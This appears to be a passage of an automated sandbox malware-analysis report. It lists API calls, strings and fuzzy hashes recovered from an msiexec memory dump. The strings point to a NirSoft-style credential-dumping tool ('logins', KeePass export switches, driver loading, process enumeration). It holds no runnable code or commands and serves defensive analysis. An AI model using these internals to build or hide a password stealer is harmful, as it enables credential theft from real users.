                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$HandleLoadMenuModuleWindow$AttributesClipboardCreateFileFormatImagePathRegisterShowTempmemcpywcslen
                                                                                                      • String ID: /nosaveload$SysListView32$commdlg_FindReplace$report.html$xE
                                                                                                      • API String ID: 4054529287-3175352466
                                                                                                      • Opcode ID: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                      • Instruction ID: 800f7bfcdfcb1fd3e7c20450dd8eb4425a557a8a4e928c852398501c1500280f
                                                                                                      • Opcode Fuzzy Hash: 80e2c4da556a6dfda94225f517483429c905b521daebd2f44f7cad3fe39d77d4
                                                                                                      • Instruction Fuzzy Hash: CBA1A271640388AFEB11DF69CC89FCA3FA5AF55304F0404B9FE48AF292C6B59548CB65
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: wcscat$_snwprintfmemset$wcscpy
                                                                                                      • String ID: color="#%s"$ size="%d"$</b>$</font>$<b>$<font
                                                                                                      • API String ID: 3143752011-1996832678
                                                                                                      • Opcode ID: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                                      • Instruction ID: fbd97de1ae08b3d7bb58c913f73a739646adbf5bc1eafa8de66ed769fffaada2
                                                                                                      • Opcode Fuzzy Hash: 054461c97bc12b3ac6a6f5d4f147efcfafa35783d9cb78a1f9dd62ddbda29cb0
                                                                                                      • Instruction Fuzzy Hash: 25310BB2500315BEE720AA55AC82DBF73BC9F81728F10815FF614621C2EB3C5A854A1D
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                                                                      • GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                                                                                      • GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                                                                                      • GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                                                                                      • GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                                                                                      • GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                                                                                      • GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                                                                                      • GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                                                                                      • GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                      • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                                                                      • API String ID: 667068680-2887671607
                                                                                                      • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                      • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                                                                      • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                                                                      • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _snwprintfmemset$wcscpy$wcscat
                                                                                                      • String ID: bgcolor="%s"$ nowrap$&nbsp;$</table><p>$<font color="%s">%s</font>$<table border="1" cellpadding="5">$<tr><td%s nowrap><b>%s</b><td bgcolor=#%s%s>%s
                                                                                                      • API String ID: 1607361635-601624466
                                                                                                      • Opcode ID: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                      • Instruction ID: 75b7dc7a1ab43caf41f6bee0dc73fa500ed8492db64f50ed133d22c14cecb56c
                                                                                                      • Opcode Fuzzy Hash: 014fce8712d2099ed920d1c21251e5be9fb3fd75ebba54fa6feefa75023380bc
                                                                                                      • Instruction Fuzzy Hash: 09619F71900208BFDF25EF54CC86EAE7BB9FF44310F1040AAF805A7296DB399A59CB55
                                                                                                      APIs
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: _snwprintf$memset$wcscpy
                                                                                                      • String ID: bgcolor="%s"$ width="%s"$</font>$<font color="%s">$<table border="1" cellpadding="5"><tr%s>$<th%s>%s%s%s
                                                                                                      • API String ID: 2000436516-3842416460
                                                                                                      • Opcode ID: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                      • Instruction ID: 0effb7443b15cd0e53e626898d2c9f551e6481245c02f09bcd1282082c9ffe88
                                                                                                      • Opcode Fuzzy Hash: 3adec529592eaa12cbb3371149c11df059df1660bb42a65f2cf1cf9995de4c18
                                                                                                      • Instruction Fuzzy Hash: C74163B194021D7AEB20EF55DC46EEB73BCFF45304F0440ABB908A2141E7759B988F66
                                                                                                      APIs
                                                                                                        • Part of subcall function 0041083A: memset.MSVCRT ref: 0041087D
                                                                                                        • Part of subcall function 0041083A: memset.MSVCRT ref: 00410892
                                                                                                        • Part of subcall function 0041083A: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                        • Part of subcall function 0041083A: SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                        • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                        • Part of subcall function 0041083A: SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                        • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                        • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                        • Part of subcall function 0041083A: GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                        • Part of subcall function 0041083A: LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                        • Part of subcall function 0041083A: GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035BF
                                                                                                      • LoadIconW.USER32(00000000,00000072), ref: 004035CA
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035DF
                                                                                                      • LoadIconW.USER32(00000000,00000074), ref: 004035E4
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004035F3
                                                                                                      • LoadIconW.USER32(00000000,00000073), ref: 004035F8
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403607
                                                                                                      • LoadIconW.USER32(00000000,00000075), ref: 0040360C
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040361B
                                                                                                      • LoadIconW.USER32(00000000,0000006F), ref: 00403620
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040362F
                                                                                                      • LoadIconW.USER32(00000000,00000076), ref: 00403634
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403643
                                                                                                      • LoadIconW.USER32(00000000,00000077), ref: 00403648
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00403657
                                                                                                      • LoadIconW.USER32(00000000,00000070), ref: 0040365C
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0040366B
                                                                                                      • LoadIconW.USER32(00000000,00000078), ref: 00403670
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 0000000F.00000002.1967723053.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_15_2_400000_msiexec.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: HandleLoadModule$Icon$ImageMessageSendmemset$ColorDirectoryFileInfoWindows
                                                                                                      • String ID:
                                                                                                      • API String ID: 1043902810-0
                                                                                                      • Opcode ID: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                      • Instruction ID: 42406aa8c1b655767e81280a563d2f976f29c17d6cb42a8b032fada3297a07e5
                                                                                                      • Opcode Fuzzy Hash: ba21586d26ed62a419f919be10df3ed56d69a9ff92c9ff52d971427a1ca70114
                                                                                                      • Instruction Fuzzy Hash: B1212EA0B857087AF63137B2DC4BF7B7A5EDF81B89F214410F35C990E0C9E6AC108929
                                                                                                      APIs
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                                                                      • _snwprintf.MSVCRT ref: 0044488A
                                                                                                      • wcscpy.MSVCRT ref: 004448B4
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,OriginalFileName,00000000,?,LegalCopyright,00000000,?,InternalName,00000000,?,CompanyName,00000000,?,ProductVersion), ref: 00444964
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: ??2@??3@_snwprintfwcscpy
                                                                                                      • String ID: %4.4X%4.4X$040904E4$CompanyName$FileDescription$FileVersion$InternalName$LegalCopyright$OriginalFileName$ProductName$ProductVersion$\VarFileInfo\Translation
                                                                                                      • API String ID: 2899246560-1542517562
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0040DBCD
                                                                                                      • memset.MSVCRT ref: 0040DBE9
                                                                                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000000,00000104,0040DDBE,?,?,00000000,00000208,000000FF,00000000,00000104), ref: 00409BD5
                                                                                                        • Part of subcall function 004447D9: ??2@YAPAXI@Z.MSVCRT(?,?,0040DC1B,?,00000000), ref: 0044480A
                                                                                                        • Part of subcall function 004447D9: _snwprintf.MSVCRT ref: 0044488A
                                                                                                        • Part of subcall function 004447D9: wcscpy.MSVCRT ref: 004448B4
                                                                                                      • wcscpy.MSVCRT ref: 0040DC2D
                                                                                                      • wcscpy.MSVCRT ref: 0040DC3C
                                                                                                      • wcscpy.MSVCRT ref: 0040DC4C
                                                                                                      • EnumResourceNamesW.KERNEL32(?,00000004,Function_0000D957,00000000), ref: 0040DCB1
                                                                                                      • EnumResourceNamesW.KERNEL32(?,00000005,Function_0000D957,00000000), ref: 0040DCBB
                                                                                                      • wcscpy.MSVCRT ref: 0040DCC3
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: wcscpy$EnumNamesResourcememset$??2@FileModuleName_snwprintf
                                                                                                      • String ID: RTL$TranslatorName$TranslatorURL$Version$general$strings
                                                                                                      • API String ID: 3330709923-517860148
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                                        • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                                        • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                                      • memset.MSVCRT ref: 0040806A
                                                                                                      • memset.MSVCRT ref: 0040807F
                                                                                                      • _wtoi.MSVCRT(00000000,00000000,00000136,00000000,00000135,00000000,00000134,00000000,00000133,00000000,00000132,00000000,00000131,00000000,00000130,00000000), ref: 004081AF
                                                                                                      • _wcsicmp.MSVCRT ref: 004081C3
                                                                                                      • memset.MSVCRT ref: 004081E4
                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,0000012E,000000FF,?,000003FF,00000000,00000000,0000012E,00000000,0000012D,?,?,?,?,?), ref: 00408218
                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040822F
                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408246
                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040825D
                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 00408274
                                                                                                        • Part of subcall function 00407FC3: _wtoi64.MSVCRT ref: 00407FC7
                                                                                                      • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF,00000000,00000000,?,?,?,?,?,?), ref: 0040828B
                                                                                                        • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E44
                                                                                                        • Part of subcall function 00407E1E: memset.MSVCRT ref: 00407E5B
                                                                                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407E7E
                                                                                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407ED7
                                                                                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407EEE
                                                                                                        • Part of subcall function 00407E1E: _mbscpy.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00407F01
                                                                                                        • Part of subcall function 00407E1E: wcscpy.MSVCRT ref: 00407F10
                                                                                                        • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                        • Part of subcall function 00407E1E: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: ByteCharMultiWide$memset$_mbscpy$_wcsicmp$CloseFileHandleSize_wtoi_wtoi64wcscpy
                                                                                                      • String ID: logins$null
                                                                                                      • API String ID: 2148543256-2163367763
                                                                                                      APIs
                                                                                                        • Part of subcall function 004096C3: CreateFileW.KERNELBASE(00000000,80000000,00000003,00000000,00000003,00000000,00000000,0044509F,00000000,?,00000000,00000104,00445E7E,?,?), ref: 004096D5
                                                                                                      • GetFileSize.KERNEL32(00000000,00000000,?,00000001,00000000,?,004089ED,?,?,?,0000001E,?,?,00000104), ref: 00408589
                                                                                                      • ??2@YAPAXI@Z.MSVCRT(00000001,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 0040859D
                                                                                                        • Part of subcall function 0040A2EF: ReadFile.KERNELBASE(00000000,00000000,004450DD,00000000,00000000,?,?,004450DD,00000000,00000000), ref: 0040A306
                                                                                                      • memset.MSVCRT ref: 004085CF
                                                                                                      • memset.MSVCRT ref: 004085F1
                                                                                                      • memset.MSVCRT ref: 00408606
                                                                                                      • strcmp.MSVCRT ref: 00408645
                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086DB
                                                                                                      • _mbscpy.MSVCRT(?,?,?,?,?,?), ref: 004086FA
                                                                                                      • memset.MSVCRT ref: 0040870E
                                                                                                      • strcmp.MSVCRT ref: 0040876B
                                                                                                      • ??3@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000001E), ref: 0040879D
                                                                                                      • CloseHandle.KERNEL32(?,?,004089ED,?,?,?,0000001E,?,?,00000104,?,?,00000104,?,?,00000104), ref: 004087A6
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: memset$File$_mbscpystrcmp$??2@??3@CloseCreateHandleReadSize
                                                                                                      • String ID: ---
                                                                                                      • API String ID: 3437578500-2854292027
                                                                                                      APIs
                                                                                                      • memset.MSVCRT ref: 0041087D
                                                                                                      • memset.MSVCRT ref: 00410892
                                                                                                      • GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 004108A4
                                                                                                      • SHGetFileInfoW.SHELL32(?,00000000,?,000002B4,00004001), ref: 004108C2
                                                                                                      • SendMessageW.USER32(?,00001003,00000001,?), ref: 004108FF
                                                                                                      • SendMessageW.USER32(?,00001003,00000000,?), ref: 00410936
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 00410951
                                                                                                      • LoadImageW.USER32(00000000,00000085,00000000,00000010,00000010,00001000), ref: 00410963
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 0041096E
                                                                                                      • LoadImageW.USER32(00000000,00000086,00000000,00000010,00000010,00001000), ref: 00410980
                                                                                                      • GetSysColor.USER32(0000000F), ref: 00410999
                                                                                                      • DeleteObject.GDI32(?), ref: 004109D0
                                                                                                      • DeleteObject.GDI32(?), ref: 004109D6
                                                                                                      • SendMessageW.USER32(00000000,00001208,00000000,?), ref: 004109F3
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                                                                      • String ID:
                                                                                                      • API String ID: 1010922700-0
                                                                                                      APIs
                                                                                                        • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                                                                      • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                                                                      • malloc.MSVCRT ref: 004186B7
                                                                                                      • free.MSVCRT ref: 004186C7
                                                                                                      • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                                                                      • free.MSVCRT ref: 004186E0
                                                                                                      • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                                                                      • malloc.MSVCRT ref: 004186FE
                                                                                                      • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                                                                      • free.MSVCRT ref: 00418716
                                                                                                      • free.MSVCRT ref: 0041872A
                                                                                                      • free.MSVCRT ref: 00418749
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: free$FullNamePath$malloc$Version
                                                                                                      • String ID: |A
                                                                                                      • API String ID: 3356672799-1717621600
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: _wcsicmp
                                                                                                      • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                                                                      • API String ID: 2081463915-1959339147
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                                        • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                                        • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                                        • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                                        • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleBaseNameW), ref: 004138ED
                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 004138FE
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleFileNameExW), ref: 0041390F
                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumProcesses), ref: 00413920
                                                                                                      • GetProcAddress.KERNEL32(00000000,GetModuleInformation), ref: 00413931
                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                                                                      • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                                      APIs
                                                                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                                                                      • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 00413865
                                                                                                      • GetProcAddress.KERNEL32(00000000,Module32First), ref: 00413876
                                                                                                      • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 00413887
                                                                                                      • GetProcAddress.KERNEL32(00000000,Process32First), ref: 00413898
                                                                                                      • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 004138A9
                                                                                                      Similarity
                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                      • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                                                                      APIs
                                                                                                      • GetDC.USER32(00000000), ref: 004121FF
                                                                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                                                                      • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                                                                      • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                                                                      • SelectObject.GDI32(?,?), ref: 00412251
                                                                                                      • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                                                                      • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                                                                        • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                                                                        • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                                                                        • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                                                                      • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                                                                      • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                                                                      • SetCursor.USER32(00000000), ref: 004122BC
                                                                                                      • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                                                                      • memcpy.MSVCRT(?,?,00002008), ref: 0041234D
                                                                                                      Similarity
                                                                                                      • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                                                                      • String ID:
                                                                                                      APIs
                                                                                                      • GetClientRect.USER32(?,?), ref: 004111E0
                                                                                                      • GetWindowRect.USER32(?,?), ref: 004111F6
                                                                                                      • GetWindowRect.USER32(?,?), ref: 0041120C
                                                                                                      • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                                                                      • GetWindowRect.USER32(00000000), ref: 0041124D
                                                                                                      • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                                                                      • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                                                                      • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                                                                      • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                                                                      • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                                                                      Similarity
                                                                                                      • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                                                                      • String ID:
                                                                                                      APIs
                                                                                                      Similarity
                                                                                                      • API ID: memset$_snwprintf
                                                                                                      • String ID: %%0.%df
                                                                                                      APIs
                                                                                                      • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                                                                      • KillTimer.USER32(?,00000041), ref: 004060D7
                                                                                                      • KillTimer.USER32(?,00000041), ref: 004060E8
                                                                                                      • GetTickCount.KERNEL32 ref: 0040610B
                                                                                                      • GetParent.USER32(?), ref: 00406136
                                                                                                      • SendMessageW.USER32(00000000), ref: 0040613D
                                                                                                      • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                                                                      • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                                                                      • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                                                                      Similarity
                                                                                                      • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                                                                      • String ID: A
                                                                                                      APIs
                                                                                                      • LoadMenuW.USER32(?,?), ref: 0040D97F
                                                                                                        • Part of subcall function 0040D7A7: GetMenuItemCount.USER32(?), ref: 0040D7BD
                                                                                                        • Part of subcall function 0040D7A7: memset.MSVCRT ref: 0040D7DC
                                                                                                        • Part of subcall function 0040D7A7: GetMenuItemInfoW.USER32 ref: 0040D818
                                                                                                        • Part of subcall function 0040D7A7: wcschr.MSVCRT ref: 0040D830
                                                                                                      • DestroyMenu.USER32(00000000), ref: 0040D99D
                                                                                                      • CreateDialogParamW.USER32(?,?,00000000,0040D952,00000000), ref: 0040D9F2
                                                                                                      • GetDesktopWindow.USER32 ref: 0040D9FD
                                                                                                      • CreateDialogParamW.USER32(?,?,00000000), ref: 0040DA0A
                                                                                                      • memset.MSVCRT ref: 0040DA23
                                                                                                      • GetWindowTextW.USER32(00000005,?,00001000), ref: 0040DA3A
                                                                                                      • EnumChildWindows.USER32(00000005,Function_0000D898,00000000), ref: 0040DA67
                                                                                                      • DestroyWindow.USER32(00000005), ref: 0040DA70
                                                                                                        • Part of subcall function 0040D5D6: _snwprintf.MSVCRT ref: 0040D5FB
                                                                                                      Similarity
                                                                                                      • API ID: Menu$Window$CreateDestroyDialogItemParammemset$ChildCountDesktopEnumInfoLoadTextWindows_snwprintfwcschr
                                                                                                      • String ID: caption
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      • <br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>, xrefs: 00410B3C
                                                                                                      • <meta http-equiv='content-type' content='text/html;charset=%s'>, xrefs: 00410ADD
                                                                                                      • <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">, xrefs: 00410A70
                                                                                                      • <table dir="rtl"><tr><td>, xrefs: 00410B00
                                                                                                      Similarity
                                                                                                      • API ID: memset$_snwprintf$wcscpy
                                                                                                      • String ID: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN">$<br><h4>%s <a href="http://www.nirsoft.net/" target="newwin">%s</a></h4><p>$<meta http-equiv='content-type' content='text/html;charset=%s'>$<table dir="rtl"><tr><td>
                                                                                                      APIs
                                                                                                      • wcschr.MSVCRT ref: 00413972
                                                                                                      • wcscpy.MSVCRT ref: 00413982
                                                                                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409806
                                                                                                        • Part of subcall function 004097F7: wcslen.MSVCRT ref: 00409810
                                                                                                        • Part of subcall function 004097F7: _memicmp.MSVCRT ref: 0040982B
                                                                                                      • wcscpy.MSVCRT ref: 004139D1
                                                                                                      • wcscat.MSVCRT ref: 004139DC
                                                                                                      • memset.MSVCRT ref: 004139B8
                                                                                                        • Part of subcall function 00409DD5: GetWindowsDirectoryW.KERNEL32(0045DC58,00000104,?,00413A11,?,?,00000000,00000208,?), ref: 00409DEB
                                                                                                        • Part of subcall function 00409DD5: wcscpy.MSVCRT ref: 00409DFB
                                                                                                      • memset.MSVCRT ref: 00413A00
                                                                                                      • memcpy.MSVCRT(?,?,00000004,?,?,00000000,00000208,?), ref: 00413A1B
                                                                                                      • wcscat.MSVCRT ref: 00413A27
                                                                                                      Similarity
                                                                                                      • API ID: wcscpy$memsetwcscatwcslen$DirectoryWindows_memicmpmemcpywcschr
                                                                                                      • String ID: \systemroot
                                                                                                      APIs
                                                                                                      Similarity
                                                                                                      • API ID: wcscpy
                                                                                                      • String ID: AppData$Common Desktop$Common Programs$Common Start Menu$Common Startup$Desktop$Favorites$Programs$Start Menu$Startup
                                                                                                      APIs
                                                                                                        • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                                                                      • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                                                                        • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                                                                        • Part of subcall function 0040BFF3: memcpy.MSVCRT(?,?,00000004,00000000,?,?,?,?,?,?,?,?,*.*,0040C2BF,00000000), ref: 0040C024
                                                                                                      • memcpy.MSVCRT(00000000,?,00000004,00000000,?,?,?,?), ref: 0040C11B
                                                                                                      • strchr.MSVCRT ref: 0040C140
                                                                                                      • strchr.MSVCRT ref: 0040C151
                                                                                                      • _strlwr.MSVCRT ref: 0040C15F
                                                                                                      • memset.MSVCRT ref: 0040C17A
                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                                                                      Strings
                                                                                                      Similarity
                                                                                                      • API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
